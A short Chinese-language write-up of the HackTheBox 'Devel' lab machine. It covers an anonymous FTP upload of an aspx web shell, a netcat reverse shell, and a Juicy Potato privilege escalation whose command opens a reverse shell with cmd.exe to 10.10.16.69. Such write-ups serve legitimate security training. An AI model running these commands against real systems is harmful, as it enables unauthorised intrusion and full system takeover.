HackTheBox-Devel
OSCP like
扫端口出来21,80.
ftp目录可以匿名访问,直接上传aspx shell。然后nc 建立反弹shell;
asp会500内部错误。
1 | whomai -priv |
提权
上传原版多汁土豆,提示无法运行。使用x86版本的Juicy-Potato-x86.
CLSID:CLSID-List
多汁土豆x86提权
1 | Juicy.Potato.x86.exe -l 1111 -p nc.exe -a "10.10.16.69 1222 -e cmd.exe" -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020} |